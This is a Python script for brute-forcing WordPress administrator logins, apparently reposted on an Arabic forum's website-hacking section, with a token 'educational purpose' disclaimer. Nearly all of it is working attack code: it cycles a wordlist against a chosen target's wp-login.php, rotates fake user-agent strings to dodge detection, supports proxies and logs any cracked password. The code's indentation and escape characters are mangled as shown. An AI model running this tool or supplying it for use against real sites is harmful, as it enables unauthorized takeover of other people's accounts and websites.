#!/usr/bin/python
# This is WordPress bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : wpbruteforcer.py
# Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
# Version : 1.0
# Date : Wed Aug 4 13:38:13 WIT 2010
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "n[*] Exiting program...n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "n[*] Exiting program...n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
__programmer__ = "gunslinger_ <yudha.gunslinger@gmail.com>"
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'wpbruteforcer.log'
file = open(log, "a")
success = 'Dashboard'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
wordpress = '''
_
| |
__ _____ _ __ __| |_ __ _ __ ___ ___ ___
/ / / _ | '__/ _` | '_ | '__/ _ / __/ __|
V V / (_) | | | (_| | |_) | | | __/\__ \__ \
_/_/ \___/|_| __,_| .__/|_| \___||___/___/
| |
|_| bruteforcer...
Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -t, --target <hostname> | Site for bruteforce wp-admin
-u, --username <username> | User for bruteforcing
-w, --wordlist <filename> | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose (more talkactiveable)
-p, --proxy <host
ort> | Set http proxy will be use
-k, --usernameproxy <username> | Set username at proxy will be use
-i, --passproxy <password> | Set password at proxy will be use
-l, --log <filename> | Specify output filename (default : fbbruteforcer.log)
-h, --help <help> | Print this help
Example : %s -t target.com -u jack -w wordlist.txt"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print wordpress
print option
file.write(wordpress)
file.write(option)
sys.exit(1)
def helpmee():
print wordpress
print hme
file.write(wordpress)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == '-t' or arg.lower() == '--target':
target = sys.argv[int(sys.argv[1:].index(arg))+2]
if "http://" in target:
target = target.replace("http://","")
if "www." in target:
target = target.replace("www.","")
targetsite = "http://www."+target+"/wp-login.php"
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("r[*] Trying %s... ttttttttttttttttttttttttt " % word)
file.write("[*] Trying %sn" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(targetsite)
br.select_form(nr=0)
br.form['log'] = username
br.form['pwd'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "nn[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %sn" % (word)
file.write("n[*] Logging in success...")
file.write("n[*] Username : %s" % (username))
file.write("n[*] Password : %snn" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "n[*] Exiting program...n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "n[*] Can't launch attack sorry, form is differentn"
file.write("n[*] Can't launch attack sorry, form is differentn")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "n[*] Can't launch attack sorry, form is differentn"
file.write("n[*] Can't launch attack sorry, form is differentn")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshP rocessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "n[*] Exiting program...n"
file.write("n[*] Exiting program...n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "n[*] Error: Check your wordlist pathn"
file.write("n[*] Error: Check your wordlist pathn")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "n[*] Exiting program...n"
file.write("n[*] Exiting program...n")
sys.exit(1)
try:
print wordpress
print "n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Target site : %s" % (targetsite)
print "[*] Account for bruteforcing "%s"" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing wp-login, please wait..."
file.write(wordpress)
file.write("n[*] Starting attack at %s" % time.strftime("%X"))
file.write("n[*] Target site : %s" % (targetsite))
file.write("n[*] Account for bruteforcing "%s"" % (username))
file.write("n[*] Loaded : %d words" % int(len(words)))
file.write("n[*] Bruteforcing wp-login, please wait...n")
except KeyboardInterrupt:
print "n[*] Exiting program...n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()
if __name__ == '__main__':
main()
منذ /11-15-2013, 04:25 AM
أداة WordPress BT بالبايثون
جديد قسم اختراق المواقع والسيرفرات
العرض المتطور
